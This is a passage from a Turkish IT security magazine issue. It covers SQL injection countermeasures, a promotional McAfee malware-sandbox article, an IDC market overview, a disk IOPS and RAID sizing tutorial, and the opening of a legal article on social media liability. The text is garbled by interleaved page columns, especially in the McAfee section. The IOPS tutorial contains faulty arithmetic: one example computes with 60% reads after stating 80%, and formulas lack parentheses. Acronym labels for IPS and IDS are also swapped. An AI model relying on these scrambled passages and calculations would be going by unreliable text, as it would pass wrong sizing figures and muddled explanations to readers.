gibi bir girdi ile yönetici tablosuna bulunan bir hesabın kullanıcı
adı ve şifresini belirleme şansına sahip olabilmekteyiz.
SQL Injection a Karşı Alınabilecek Güvenlik Önlemleri
• Web Sunucular ile veri tabanları birbirinden ayrılmalı ve web
sunucu üzerinden veri tabanına sunucusuna kontrolsüz erişim
engellenmelidir.
• Site üzerine kullanıcılar tarafından yollanan girdilerde SQL sorgularında kullanılan özel karakterler filtrelenmeli, gerektiği takdirde
girdilerdeki bazı karakterler kaldırılmalıdır.
• Veri tabanı sunucusu üzerinde servisleri çalıştırmak için kullanılan
hesaplar ve veri tabanı sunucusu üzerinde bulunan kullanıcı hesaplarının yetkileri düzenlenmeli ve gereksiz yetkiler kaldırılmalıdır.
• Bünyeniz dâhilindeki Web sunucularınız, Web Zafiyeti Denetleme
Araçları ile düzenli olarak denetlenmeli ve raporlanmalıdır. Site bileşenlerindeki her değişiklik sonrası bu denetim tekrar edilmelidir.
• Web sunucularınız önünde mümkün ise WAF (Web Application
Firewall) konumlandırmalıdır.
• SQL sunucularınız veri tabanı güvenliğini sağlamaya yönelik
yazılım veya donanımlar tarafından kontrol edilmelidir.
• Kullanılmayan stored procedureler kaldırılmalıdır.
Bu gibi bir çok girdi ile sadece tarayıcı kullanarak bir çok SQL
Injection denemesi yapılabilmektedir. Bunun yanında birçok araç
Kasım 2013 beyaz şapka 11
Serkan Kırmızıgül
[email protected]
McAfee Advanced Threat Defense
McAfee Advanced Threat Defense ürün ailesi ile son kullanıcıların detaylı
malware araştırma yapmasının yanında, bilinmeyen zararlıların ağ içerisinde
yayılımınıda engelliyor.
McAfee Advanced Threat Defense
Çözüm şu anda McAfee tarafından 2 farklı appliance ile sunulmakta
McAfee 2012 yılında, malware tespit konusunda sandbox tekno-
olup özetle;
lojisine sahip ValidEdge firmasını satın alarak Advanced Malware
MATD 3000: Maximum 30 sanal sistem ve üzerinde günde maximum
departmanına ilave etti. 2011 de Gartner tarafından değerlendirilen
150.000 obje ve 25.000 dosya analiz edilebilir.
firma 2004 yılından bu yana birçok büyük firma ve kurumların ağlarında transparent olarak malware araştırması yapan bir ürün
olarak çalışa gelmesinin yanında, birçok antivirüs firmasının malware
tespit laboratuvarlarında kullanılan araçların başında gelmektedir.
1 yıllık geliştirme süreci sonunda ValidEdge teknolojisi McAfee
Advanced Treat Defense ismiyle son müşterilerin kullanımına sunulmuş durumdadır.
MATD 6000: Maximum 60 sanal sistem ve üzerinde günde maximum
250.000 obje ve 50.000 dosya analiz edilebilir yapıdadır.
Sunulan appliance’lar üzerinde sıkıştırılmış 64 bit linux OS ile
birlikte hypervisor tip-1 desteği verilmektedir. Sanal sistemler
üzerinde Windows ve Android işletim sistemleri koşabilmektedir.
Hazır ve özelleştirilebilen işletim sistemlerinin yanında kurumsal
işletim sistemlerinin imajları sisteme tanıtılabilmektedir.
Operasyonel kullanım tipi olarak şu
anda standalone kullanım yönteminin yanında McAfee WebGateway
ve McAfee Network IPS ürünleri ile
herhangi bir ek maliyete neden olmadan entegre çalışabilmektedir.
Ayrıca donanımlar kısa dönem yol
haritası içerisinde, span ve inline
modlarını da destekler hale gelecektir.
İnternet olmayan kapalı ağ kullanım
metodu destekleniyor olup üzerinde
HTTP, SMTP, FTP, TELNET ve DNS
servislerini simule edilebilmekte dolayısıyla fiziksel internet ihtiyacına
gerek kalmamaktadır.
12 beyaz şapka Kasım 2013
Malware analiz noktasında barındırdığı teknikler özellikle diğer
benzer üreticilere göre farklılık göstermektedir. Başlıca analiz tipleri
şöyle özetlenebilir;
• GTI Query/Update
Hâlihazırda piyasada kullanılan malware tespit analiz ürünlerinin
ürettiği tespit rapor sonuçları ile McAfee’nin son dönemde sunduğu
• Local Whitelist (McAfee Application Control veri tabanını kullanıyor
ve MATD çözümü içerisinde de kullanılan McAfee GAM (hâlihazırda
olup temiz olduğu bilinen dosyaların hash bilgilerini içermekte-
McAfee Web Gateway ve McAfee Network IPS tarafından kullanıl-
dir.)
maktadır) motorunun ürettiği raporlar arasındaki farklar neredeyse
• Local Blacklist
%5-10 seviyelerinde iken MATD deki diğer teknikler dikkate alındığı
durumlardaki sonuçlar ise sektör ortalamalarının üzerine ulaşmak-
• McAfee AV Scan
• McAfee GTI reputation
tadır.
Dinamik ve statik analizler bir arada kullanılabilir yapıda olup
• McAfee Gateway Antimalware
genel teknikler şöyle özetlenebilir;
• Sandbox Analisys
Dinamik Analiz Metodu:
• Yara Rules (http://code.google.com/p/yara-project/ )
• Registry değişimlerinin gözlenmesi
Kasım 2013 beyaz şapka 13
Serkan Kırmızıgül
[email protected]
• Ağ bağlantılarının gözlenmesi
• İşletim sistemi Process’lerinin gözlenmesi
dosyalar analiz için restful API ile MATD ye tekrar analiz için
gönderilir. Gönderilen dosyalar Web Gateway tarafından kullanılan
analiz metotlarından tekrar geçirilmez sandbox ve Yara gibi diğer
• Dosya sistem değişikliklerinin gözlenmesi
Statik Analiz Metodu: (Alınan kaynak kod üzerinde)
• Direk analiz
tekniklerle analiz için detaylandırılır.(MWG 7.4 sürümü ile birlikte).Değerlendirme sonucunda malware olarak kabul edilen kodun hash
bilgisi MWG tarafına aktarılır ve bundan sonra benzer file-hash bilgisinin tespit edilmesi durumunda otomatik dosya engellenir.
• Kodun parçalara ayrıştırılması
• Ayrılan parçalar üzerinde analiz
• Tespit edilen kod parçalarının ne yaptığının anlaşılması
MWG in detaylı kural alt yapısı farklı tekniklerle tespit edilen zararlı
dosyaların HASH bilgilerinin manual olarak tanımlanan listeler
yoluyla engellenmesini de desteklediğini hatırlatmak isterim. MWG
üzerinde SSL Inspection açılması durumunda ise HTTPS protokolü
• Malware’in sınıflandırılması
içinde benzer senaryolar işletilebilmektedir. Entegrasyon ile birlikte
Özellikle statik analiz sırasında unpack yöntemini incelemelerde
MWG üzerinde yeni log kayıt tipi tanımlanmış olup (atdscan.log)
kullanabilmesi upx gibi sıkıştırma ve atlatma tekniklerini kullanan
source ip, file name, URL ve hash bilgisi gibi önemli bilgiler içer-
kodların tam olarak incelenmesine imkân sağlamaktadır.
mektedir.
Kodların sandbox yöntemi ile çalıştırıldığı senaryolarda sistem yö-
Network Security Platform (NIPS):
neticisi isterse kodun son kullanıcı sistemindeki davranışlarını ilgili
üzerinde aktifleştirilmesi durumunda NTBA üzerindeki GAM engine
sanal makinaya uzak bağlantı yaparak izleyebilmektedir.
otomatik disable edilir. Desteklenen dosya tipleri MATD’ye iletilir.
Desteklenen dosya tipleri ise şöyledir:
• Executables (.exe, .dll, .scr, .ocx, .sys, .com, .drv,
.cpl)
• MS Office Files (.doc, .docx, .xls, .xlsx. .ppt,
.pptx)
• PDF Files
• Compressed Files (.zip, .rar)
• Android Application Package (.apk)
• Java Archives (JAR)
Mevcut McAfee ürünleri ile ilgili entegrasyon
detayları ise şöyle özetlenebilir:
McAfee Web Gateway: MWG ürün ailesi
sektördeki en güçlü malware tespit motorlarına
sahip olup bunların başında GTI reputation teknikleri ve McAfee GAM motoru gelmektedir. Bu
motorlar tarafından %60 seviyesinde süphenilen
14 beyaz şapka Kasım 2013
MATD’nin NSP
Göderilen dosyanın son byte bilgisi MATD tarafından veri tabanındaki
bulunduğu makinada process name, image path, hash of process,
malware örnek dosyaları tarafından kontrol edilir. Eğer bilgi yok
file name ve registry key bilgileri anlık raporlanabilecektir. Sonraki
ise analiz için kuyruğa alınır. Analiz sonuçlarına istinaden custom
adım ise otomatik olarak son kullanıcı sistemlerindeki bu zararlıların
finger print bilgisi NSM tarafında oluşur ve benzer dosya hareketleri
temizlenmesi olacaktır.
bu aşamadan itibaren IPS tarafından engellenebilir seviyeye çekilmiş
olur (Version 8). Desteklenen bu senaryolara ek olarak McAfee, Fi-
McAfee MATD’yi son derece stratejik bir teknoloji olarak görmekte
rewall teknolojisinde kullandığı Network Integrity Agent’i geliştirilerek
buna istinaden birçok ürünün entegrasyonunu yol haritası içerisinde
McAfee Endpoint Intelligence (EIA) ismiyle Network IPS teknolojisinde
önceliklendirmiş durumdadır. Önceliklendirilmiş ürün entegrasyonları
kullanmaya başladı. Bu yolla NSP, ePo ve EIA birlikteliği, zararlı
McAfee Email Gateway, McAfee Entrprise Firewall, McAfee SaaS,
kodun ve hash’in son kullanıcı makinasından aslında hangi gerçek
McAfee ePo ve ePo realtime olarak sıralanabilir.
process tarafından kullanıldığı bilgisini üretebilmekte ve ePo
yoluyla raporlayabilmektedir.
Anlaşılır, detaylı raporlama imkanları, kolay entegrasyon ve yönetim
senaryoları ile MATD çözümü, çok iyi analitik engine’leri ile mevcut
ePo ve realtime ePo entegrasyonunun sonuçlanmasına istinaden
ePo ve EIA yoluyla toplanan bilgilere istinaden MATD üzerinde
hedefe dönük analizler yapılabilecek sonucunda yüksek performans
ile kesin kod tespiti sağlanacaktır. ePo-realtime ile birlikte zararlının
McAfee müşterileri açısından uygun fiyat ve lisanslama modeli ile
yüksek fayda getireceği açıktır.
Lütfen detaylı bilgi için benimle temasa geçmekte tereddüt etmeyin.
Kasım 2013 beyaz şapka 15
Ramazan Yavuz, Yeşim Araç
[email protected], [email protected]
Ramazan Yavuz, Kıdemli Araştırma Analisti, Güvenlik Donanımları
Yeşim Araç, Araştırma Analisti, Yazılım ve BT Hizmetleri
Türkiye Güvenlik Sektörüne
Global Bir Bakış
Bilişim teknolojilerindeki yeni gereksinimler ve çok hızlı değişim BT dünyasında
köklü paradigma değişikliklerine neden oluyor. Türkiye bu değişimin neresinde
yer almaktadır ve güvenlik sektörü teknolojileri ne yönde hareket etmektedir?
H
er geçen gün gelişen yeni BT uygulamaları BT güvenliğinde
yeni yaklaşımlar ve öncelikler getirmektedir. Firmaların iletişim ve iş yapma biçimleri yeni teknolojilerle değiştikçe,
BT güvenliğini sağlamak daha karmaşık bir hale geliyor. Şirketlerin
sanallaştırma, sanal ofisler, bulut bilişim ve daha birçok teknolojiyle
evrimleşen BT altyapılarında, BT güvenliği artık izole bir alan olmaktan çıktı. Bugünün şirketleri BT güvenliği stratejilerini oluştururken tüm bu teknolojilerin ve yeniliklerin ışığında düşünmek
durumundadırlar.
IDC olarak bu yazımızda güvenlik yazılımları ve güvenlik donanımları
başlıkları altında güvenlik sektöründeki ana trend ve yaklaşımları,
bunların güvenlik ve is stratejilerine nasıl imkanlar tanıdığını ve
kullanıcı ve firmalar tarafında nasıl algılandıklarını aktaracağız.
A. Türkiye Güvenlik Sektöründe Yazılım
Türkiye'de güvenlik yazılımlarının önemi gün geçtikçe artıyor ve
bilinç oluşturulması için yıllardır yapılan çalışmalar artık meyvesini
veriyor. Her ölçekteki şirket belirli büyüklüklerde güvenlik yazılımları
yatırımı yapması gerektiğinin bilincinde ve bu doğrultuda harekete
geçiyor. Ülkemizde güvenlik yazılımlarına "olsa iyi olur" ancak
"olmasa da olur" diye bakılırken artık bu görüş "kesinlikle olmalı"
yönüne doğru kayıyor. Bu yönelimi güvenlik yazılımları pazarının
büyüme trendine ve tahminlere bakarak açık bir şekilde görebiliriz.
Rekabetin yüksek olduğu güvenlik yazılımları pazarında "Güvenli
İçerik ve Tehdit Yönetimi" yatırımları büyük bir farkla birinci sırada
yer alıyor. Güvenli içerik ve tehdit yönetimi, son kullanıcı güvenliği,
ağ güvenliği, mesajlaşma güvenliği ve web güvenliği alt başlıklarını
kapsıyor. Bir başka başlık olan "Güvenlik yönetimi" yatırımları ise
ikinci sırada yer alıyor ve yama yönetimi, güvenlik loglarının korelasyonu gibi yazılımları içeriyor. Ülkemizde uzun sürelerdir yatırım
yapılan diğer bir konu ise kimlik ve erişim yönetimidir ve güvenlik
yönetimi yatırımlarını takip etmektedir. Kimlik ve erişim yönetimi,
bir organizasyonun bütün birimlerini kapsadığı için süreçler uzun
sürmekte, bu da projelerdeki başarı oranlarını düşürmektedir. Bir
organizasyonda yer alan projeyle ilgili birimlerin bu projeyi benimsemesi ve kimlik ve erişim yönetimi konusunda bilgilenip, bilinçlenmesi sağlanırsa başarılı projeler gerçekleşecektir.
Sektör bazında değerlendirecek olursak güvenlik yazılımlarının
en büyük yatırımcısı finans sektörüdür, sonra sırayla kamu sektörü
ve telekom sektörü gelmektedir. Finans sektöründeki yatırımın
fazla olmasının önemli bir sebebi hızla yeni banka şubelerinin
açılması ve dolayısıyla güvenlik yazılımlarına olan ihtiyaç hacminin
genişlemesinden kaynaklanmaktadır. Özellikle bankalar müşterilerine
güvenli erişim sunabilmek için çeşitli güvenlik yazılımları kullanmaktadırlar. Bu gibi sektörlerin yatırımlarını, siber suçların artması,
bilgi güvenliğine yönelik tehditler ve regülasyonlar tetiklemektedir.
Bulut ve sanallaştırma gibi teknolojiler ve mobil cihazların kullanımındaki hızlı artış da kurumlardaki güvenlik tehditlerini arttırmakta
ve çeşitli güvenlik önlemlerinin alınmasını gerektirmektedir.
Güvenlik yazılımları pazarındaki en büyük engellerden biri ise
kalifiye çalışan sayısının az olması ve niş olarak tanımlanan
trendler ve ürünler için gerekli yeterliliğe sahip iş ortaklarının
üreticiler tarafından bulunamamasıdır. Bu nedenle üreticiler
partnerlerinin eğitim sürecini desteklemeli, güvenlik yazılımları
sektöründe kalifiye çalışan oranının artmasına katkıda bulunmalıdırlar. Güvenlik yazılımı üreticileri etkinlikler ve çeşitli
yayınlarla gerçekleştirdikleri pazarlama faaliyetlerinde müşterileri
olabildiğince bilinçlendirme ve bilgilendirme amacında olmalıdırlar. Müşteriler ise yeni trendleri takip etmeli, bilgilenmeli ve
güvenliği artık bir gereklilik olarak görmelidirler. Gerekliliğine
inandıkları güvenlik yazılımlarına yatırım yaparak önlemlerini
herhangi bir güvenlik tehdidiyle karşılaşmadan önce almalıdırlar.
B. Türkiye Güvenlik Sektöründe Donanım
Tarihsel olarak firewall donanımları, Türkiye’de en popüler ve en
çok uygulanan güvenlik çözümlerinden biriydi. Geçtiğimiz yıllarda
BT güvenlik pazarı değişik güvenlik fonksiyonlarını kombine eden,
Firewall ile Sanal Özel Ağ (VPN), Saldırı Sezme ile Önleme Sistemleri
(IDP) ve Birleşik Tehdit Önleme Yönetimleri (UTM) donanımları
gibi, donanımlara yönelmiş durumda. Güvenlik donanımı çözümlerine olan talep arttıkça; çok işlevli güvenlik donanımları, hâlihazırda
pazar payı kaybeden Saldırı Sezme (IPS), Saldırı Önleme (IDS) sistemleri ve Sanal Özel Ağlar (VPN) gibi tek işlevli donanımların
pazar payını azaltmaktadır.
Güvenlik tehditleri daha karmaşık ve daha güçlü hale geldikçe,
16 beyaz şapka Kasım 2013
tek bir platform üstünde birçok işlevi birleştiren daha güçlü ve
tüm sistemlere entegre olan güvenlik çözümlerinin önemi de artmaktadır. Bu etmen, Türk şirketlerinin birçok fonksiyonu birleştiren
donanımları tercih etmesinin nedenlerinden biridir.
bütün işlevlerin kullanılıp kullanılmaması değil, şirketlerin tüm
önemli BT güvenliği risklerini yeteri kadar değerlendirip değerlendiremediğidir.
UTM, Firewall ve diğer güvenlik donanımları BT güvenlik sisteminin
bir parçasıdır. Bu çözümler gereklidir fakat bilgisayar ve bilgisayar
ağlarının etkili güvenliğini sağlamak için yeterli önlemler değildir.
Kendi-Cihazını-Getir trendi veya kurumsal ağlara bağlanan cihaz
sayısındaki sürekli artıştan kaynaklanan değişiklikler gibi etmenler
kullanıcı davranışlarında değişikliklere neden olmaktadır. Bunun
gibi çok hızlı değişen modern şartlar; BT güvenliği sorumlularının
bu tür değişimlerden kaynaklanan tehditleri saptamalarını ve olası
problemleri önlemek için gerekli önlemleri planlamalarını gerektirmektedir. Etkili bir güvenlik yönetimi için en önemli üç adım şu
şekilde tanımlanabilir:
- Tam risk değerlendirmesi
- İlgili güvenlik prosedürlerinin işletilmesi
- Kullanıcı eğitimi.
Gerçekten de tek işlevli güvenlik donanımları ile karşılaştırıldıklarında,
çok işlevli donanımlar hem kolayca uygulanabilmeleri hem de
geniş bir spektrumda koruma sağlamaları açısından daha fazla ön
plana çıkmaktadırlar. Ayrıca bu donanımlar şirketlerin kurulum,
bakım ve yönetim servislerini gerçekleştiren BT çalışanlarının
sayısını azaltmasına olanak tanımaktadır. Bu etmen özellikle değişik
coğrafi noktalarda uzak ofisi olan şirketler için önem arz etmektedir.
Hâlihazırda üreticiler çok işlevli donanımları kobilerden veri merkezlerine ve devlet kurumlarına kadar tüm segmentlere sunmaktadır.
Bu ürünler tüm son kullanıcı segmentlerinin ihtiyaçlarını karşılayacak
şekilde konumlandırılmaktadır. Modern çok işlevli donanımlar ölçeklenebilmektedir, şirketlerin ve kurumların değişen ihtiyaçlarına
ve kurumsal güvenlik stratejilerindeki değişikliklere uyum sağlayacak
özellikleri barındırmaktadır. Şirketler donanımda kullanmak istedikleri
özellikleri satın alabilir ve ileride ihtiyaç duyuldukça URL filtreleme,
antivirus, antispam gibi diğer ilave fonksiyonları kullanıma açabilir
ya da ilgili yazılım modüllerini satın alabilirler.
Aynı zamanda yüksek oranda entegre edilebilen donanımlar bazı
potansiyel güçlükleri de barındırmaktadır. Örneğin, donanım çalışmadığında, bütün ağ cihaz onarılıncaya ya da değiştirilinceye
kadar korumasız kalacaktır. Bu cihazların diğer bir kısıtı ise büyüyen
şirketler için yeterli esnekliği sağlayamamalarıdır. Eğer ağ trafiği
hızlı artarsa, donanım bu hızlı artışla baş edemeyebilir. Bu da
şirketin tüm donanım sistemini yenilemesi anlamına gelir ki bunun
maliyetli olacağı açıktır.
Türkiye’de çok işlevli donanımlara duyulan talebin artıyor olması
şirketlerin entegre edilebilirlik ve basit uygulanabilirlik gibi faydalardan yararlanabilmek için farklı güvenlik fonksiyonlarını hazır
bulundurmaya önem verdiklerini göstermektedir. Bununla beraber
asıl sorulması gereken soru güvenlik donanımlarında bulunan
BT güvenliği yönetmelikleri ve standartları (PCI-DCC, ISO/IEC 27001,
NIST ve diğerleri) güvenli bir BT sistemi geliştirmek için kılavuz
oluşturmaktadır. BT güvenliği denetimleri ve akredite organizasyonlar
tarafından verilen sertifikasyonlar şirket ve kurumlardaki BT güvenliğinin kabul gören standartları karşılamasına yardımcı olmaktadır.
Güvenlik donanımları etkili bir güvenlik konseptinin sadece bir
parçasıdır ve tüm BT güvenlik sistemi kapsamında değerlendirilmelidirler.
Özetle, şirketler maruz oldukları tehditlere uygun güvenlik çözümleri
geliştirmelidir. Bu çözümler donanım yazılım, bulut servisleri, ya
da bunların bir bileşimi olabilir. Türkiye’de donanım çözümleri BT
güvenliğinde tercih edilmektedir. Donanım çözümleri içerisinde
ise çok işlevli donanımlar tek işlevli donanımlara tercih edilmektedir.
UTM donanımları için talep önemli oranda orta ve küçük ölçekli
firmalardan gelmektedir. Bununla beraber, mobil teknolojilerin ve
güvenlik çözümlerinin gelişmesiyle beraber bulut servislerinin de
gelecekte bu segmentlerde de önemli olacağı açıktır.
IDC
International Data Corporation (IDC), bilgi teknolojileri, telekomünikasyon ve tüketici teknolojileri alanlarında pazar araştırması,
danışmanlık ve etkinlik hizmetleri sunan, önde gelen küresel pazar
araştırma firmasıdır. IDC, BT çalışanlarının, şirket yöneticilerinin ve
yatırım çevrelerinin teknoloji harcamalarında ve ticari stratejilerini
belirlemede gerçeklere dayalı kararlar almalarına yardımcı olur.
Dünya çapında 110’un üzerinde ülkede, 1000'den fazla IDC analisti
teknoloji, sektörel fırsatlar ve trendler hakkında küresel, bölgesel
ve yerel uzmanlık sunmaktadır. IDC, 48 yılı aşkın bir süredir müşterilerine stratejik bilgiler sunarak, iş hedeflerine ulaşmalarına yardımcı
olmaktadır. IDC, bilgi teknolojileri medyası, araştırma ve etkinlik
alanında dünyanın lider kuruluşu olan IDG’nin bir yan şirketidir.
Mayıs 2013 beyaz şapka 17
Tarkan Çiçek
[email protected]
Disk Veri Depolama Sistemleri (devam):
Disk Performans Hesaplamaları:
Bilgisayar sistemlerinde performansı etkileyen dört ana faktör
vardır.
Bir örnek ile durumu açıklayalım;
Bunlar;
Seagate.com’dan aldığımız 2.5” ve10Krpm Savvio disklerin bilgileri
ile;
1. İşlemci
Ortalama Erişim Süresi: 3.6ms (3.4-3.8)
2. Bellek
Gecikme Süresi: 3ms
3. Ağ bağlantısı
1 / ((3 + 3.6)/1000) = 1 / 0.0066 = 150 IOPS
4. Disk
Bu değerde genel kabul gören değerlere denk geliyor. Aşağıda
mevcut diskler için genel kabul gören bu değerleri tablo olarak
veriyorum.
Konumuz gereği biz son madde üzerinde duracağız. Yani saniyede
yapılan giriş çıkış işlem sayısı daha bilinen adı ile IOPS (Input
Output Per Second).
Bu değerlerin de sıfır bayt transferler ile ölçülen değerler olduğunu
belirtmemde fayda var. Okunan/yazılan blok büyüklüğü arttıkça
değerler azalır. Disk sektör büyüklüğünün 512B olduğunu yani en
ufak okunabilecek bilgi büyüklüğünün 0.5K olduğunu, 0.5K-128K
aralığında %10’luk bir geri gelme yaşandığını not edelim. Yani
0.5K için 100 olan değer 128K için 90’a inmektedir.
Raid Performans Hesaplamaları:
Kullanmakta olduğumuz disklerin yapabildiği IOPS miktarı tek
başlarına basit bir formül ile hesaplanabilir. Bu formül 1 saniyenin
diskin dataya ortalama erişim süresi ile bölünmesidir. Bu şekilde 1
saniye içinde disk üzerindeki bir veriye kaç defa erişilebileceği hesaplanmış olur. Disk üreticileri averaj erişim sürelerini milisaniye
(1/1000sn) cinsinden verdiklerinden önce averaj erişim süresi değerinin saniyeye çevrilmesi yani 1000’e bölünmesi ile elde edilen
değerin 1/x olarak kullanılması gerekir. Disklerdeki averaj erişim
süresi ise; Average Seek Time (ortalama erişim süresi) + Average
Latency (ortalama gecikme) şeklinde hesaplanır. Sırası gelmişken
geriye dönerek bir hatırlatma yapalım. Hatırlarsanız iki önceki
sayıda diskin temel yapılarından bahsederken Track (iz), Head
(kafa), Sector (sektör) terimlerinden bahsetmiştik. Seek Time,
kafanın istenilen bilginin olduğu ize varması için geçen zamanı,
Average Latency ise kafanın ilgili ize geldikten sonra istenilen
bilginin okunmasına kadar geçen süreyi belirler.
18 beyaz şapka Kasım 2013
Tek başına kullanıldığında standart disklerin performansları gördüğünüz üzere öyle kayda değer ölçüde değiller. Eğer bir sunucu,
iş istasyonu veya PC üzerinde yüksek disk performansına ihtiyaç
duyuyorsanız bunu SSD haricinde tek bir sabit disk ile çözmeniz
mümkün olmayacaktır. Performansı arttırmak için disklerin paralel
olarak yazma okuma yapabilecek şekilde bir araya getirilmesi
gerekir. Bunun içinde RAID yapıları kullanılır. Raid yapıları daha
önce değindiğimiz üzere, diskleri performans ve kapasite elde
etmek üzere kümeler içinde barındıran yapılardır. Raid0 hariç tüm
Raid yapılarında küme içindeki 1 veya daha fazla diskin hatası düzeltilebilir (Raid yapılarını önceki sayılardan okuyabilirsiniz).
Raid yapılarında Raid modelinden bağımsız olarak grup içinde
kullanılan aktif disk adedi ile kullanılan disk modelinin IOPS ‘u çarpıldığında toplam okuma IOPS değerini verir. Yani Raid0 ve 10
Adet 10K disk kullanıyorsanız 10x150 = 1,500 IOPS okuma performansı elde edebilirsiniz. Yazma IOPS değerini ise Raid0 haricindeki
yapılarda formül ile hesaplamamız gerekir. Bunun nedeni kullanılan
Raid tipine göre yazma işlemlerinin bir yazma penaltısına neden
olmasıdır.
Bu penaltı değerleri ise;
Raid 0 = 0
Raid 1 = 2
Raid 5 = 4
Raid 6 = 6
Bu değerlere göre 10 adet 10K ‘lık disk kullandığımızda ve %100
yazma işlemi yaptığımızda elde edeceğimiz IO değerleri şu şekilde
olacaktır.
Gerekli disk adedinin hesabı için kullanacağımız Formül ise:
gIO = Gereken IOPS
iIO = İstenilen IOPS
%y = Yazma Oranı
P = Yazma Penaltısı
%o = %Okuma
dIO = Disk başına IOPS miktarı
gIO=(iIO*%o)+(iIO*%y*P)
Gerekli Disk Adedi = gIO⁄dIO
Birim Disk Kapasitesi = İstenilen Ham Kapasite / Gereken Disk Adedi
Örnek1:
İhtiyaç; 20TB Ham Kapasite, iIO=10,000 IOPS, 16K Blok, %40 Yazma, %60 Okuma
Kullanılacak Disk: 2.5”10K Disk, 16K için performans değeri = 145 IOPS
Raid 5 için;
Şimdi bir diğer soruya da cevap vermek gerekiyor “Elimdeki veri
depolama ünitesinin performansını nasıl hesaplarım?” Bunu hesaplamak için aşağıdaki formülü kullanıyoruz.
d = Disk adedi
IOPS=
d*dio
%o+(P*%y)
Bunu bir örnekle açıklayalım
Örnek: Elimizde 48 Diskli, 15Krpm SAS diskleri olan ve tüm yapısı
Raid5 ile oluşturulmuş, %25 yazma, %75 okuma yükü olan bir depolama ünitesinden ne kadar IOPS elde edebiliriz?
IOPS = 48 * 210 / 0.75 + (4 * 0.25)
IOPS = 10,080 / 1.75
IOPS = 5.760
Aynı sistemi Raid 10 ile kullanıyor olsaydık;
IOPS = 48 * 210 / 0.75 + (2 * 0.25)
IOPS = 10,080 / 1.25
IOPS = 8,064
Yeni bir veri depolama sistemi alırken yaklaşık ne kadar diske
ihtiyaç duyacağımızı da farklı bir formülle hesaplayabiliriz. Öncelikle
ihtiyacımız olan IO miktarını ve blok büyüklüklerini hesaplayıp ardından kullanmamız gereken disk miktarını aşağıdaki formüle uygulayarak bulabiliriz.
Okuma ve yazma IOPS’ları farklı hesaplandığından istediğimiz IO
değeri için yüzde olarak ne kadar yazma ve ne kadar okuma yapacağımızı da belirlememiz faydalı olacaktır. Mevcut yapınızdaki
yazma ve okuma oranlarını bilmiyorsanız Perfmon ile disk performans
bilgilerini aldıktan sonra. Yazma ve Okuma IO değerleri ile şu
formülü uygulayarak oranları çıkarabilirsiniz.
%Yazma (%y) =
%Okuma (%o) =
Disk Writes/sec
Disk Transfer/Sec
Disk Reads/sec
Disk Transfer/Sec
Gereken IOPS = (10,000 * %40 * 4) + (10,000 * %60)
Gereken IOPS = 16,000 + 6,000 = 22,000
Gerekli Disk Adedi = 22,000 / 145 = 152 Adet
Birim Disk Kapasitesi = 20,000 / 152 = 132GB
Raid 10 için;
Gereken IOPS = (10,000 * %40 * 2) + (10,000 * %60)
Gereken IOPS = 8,000 + 6,000 = 14,000
Gerekli Disk Adedi = 14,000 / 145 = 97Adet
Birim Disk Kapasitesi = 20,000 / 97 = 206GB
Raid 6 için;
Gereken IOPS = (10,000 * %40 * 6)+(10,000 * %60)
Gereken IOPS = 24,000 + 6,000 = 30,000
Gerekli Disk Adedi = 30,000 / 145 = 202 Adet
Birim Disk Kapasitesi = 20,000 / 202 = 100GB
Örnek2:
İhtiyaç; 20TB Ham Kapasite, iIO=10,000 IOPS, 4K Blok, %20 Yazma,
%80 Okuma
Kullanılacak Disk: 2.5” 10K Disk, 4K için performans değeri = 145 IOPS
Raid 5 için;
Gereken IOPS = (10,000 * %20 * 4) + (10,000 * %60)
Gereken IOPS = 8,000 + 6,000 = 14,000
Gerekli Disk Adedi = 14,000 / 145 = 97 Adet
Birim Disk Kapasitesi = 20,000 / 97 = 206GB
Yukarıdaki hesaplamalar temel hesaplama kriterleri gözetilerek ve
klasik sabit disklerin kullanımı göz önünde bulundurularak yapılmıştır.
Buradaki hesaplamalarda yazma ve okumada kullanılacak önbellek
miktarı, Depolama sisteminin başarımı, gecikmeler, önbellekten
okuma/yazma oranları, SSD disk kullanımı, Tiering vb. yeni yapılar
dikkate alınmamıştır. Temel veri depolama performans hesaplaması
bu şekilde yapılmaktadır. Burada elde edilen değer kullanılan disk
adedi ve Raid yapısına göre diğer değişkenlerden bağımsız olarak
alınması beklenen IOPS performans değerini verir.
Yeni ürünlere ve teknolojilere göre diğer değişkenleri de katarak
yapılacak hesaplamaları üreticilerin kendilerine veya çözüm ortaklarına yaptırmak daha doğru olacaktır. Çünkü bu değerler ve
başarımlar her ürüne göre farklılıklar gösterebilir.
Kasım 2013 beyaz şapka 19
Av. Mehmet Bedii Kaya
[email protected]
İstanbul Bilgi Üniversitesi Bilişim
ve Teknoloji Hukuku Enstitüsü,
Öğretim Görevlisi
Sosyal Medya Paylaşımları Sebebiyle
Hukuki Sorumluluk
* Sosyal medyada yapılan paylaşımlar sebebiyle hukuki ve cezai sorumluluğun
sınırları nelerdir? Başkasına ait içeriği paylaşma hukuki veya cezai sorumluluğa sebep olur mu?
İ
nternet kullanımının yaygınlaşmasıyla birlikte İnternet kullanıcılarının hukuki ve cezai sorumluluklarının hangi esaslara tabi
olacağı dünyada olduğu gibi Türkiye'de de önemli bir tartışma
konusu olmuştur. Türk hukukunda İnternet içeriği sebebiyle sorumluluk rejimi İnternetin kullanım alanlarının yaygınlaşmasıyla
aynı doğrultuda gelişmiştir. Sosyal medya kullanımının yaygınlaşması
ve kitlesel örgütlenmedeki etkisi sorumluluk rejimine yeni bir
boyut kazandırmıştır. Nihayetinde sosyal medya siteleri bireylere
kendilerini ifade olanağı sağladığı gibi, farklı konumlardaki bireylerin
hızlıca örgütlenmelerini, ortak bir payda altında ittifaklar kurmalarını
ve kitlesel tepki koymalarını sağlamaktadır. Bu bağlamda, sosyal
medyada yapılan paylaşımlar sebebiyle hukuki ve cezai sorumluluğun
sınırlarının neler olduğu ve özellikle başkasına ait içeriği paylaşmanın
hukuki sorumluluğa sebep olup olmayacağı son dönemde önemli
bir gündem konusu olmuştur.
Sorumluluk rejiminin Türk hukukundaki gelişmesi üç ana safhada
değerlendirilebilir:
20 beyaz şapka Kasım 2013
İlk safha Türkiye’nin İnternet ağına dâhil olduğu 1993 yılında
başlamıştır. 2000 yılına kadar devam eden bu safhada İnternet sınırlı
bir akademik ve kamusal kitleye hitap ettiği için İnternet içeriği sebebiyle sorumluluk rejimi yeterince tartışılmamış ve bu konuda
esaslı sorunlar yaşanmamıştır.
İkinci safha DSL bağlantıların ucuzlamaya ve yaygınlaşmaya başladığı
2000 yılında başlamıştır. Bu aşamadan itibaren İnternetin hangi
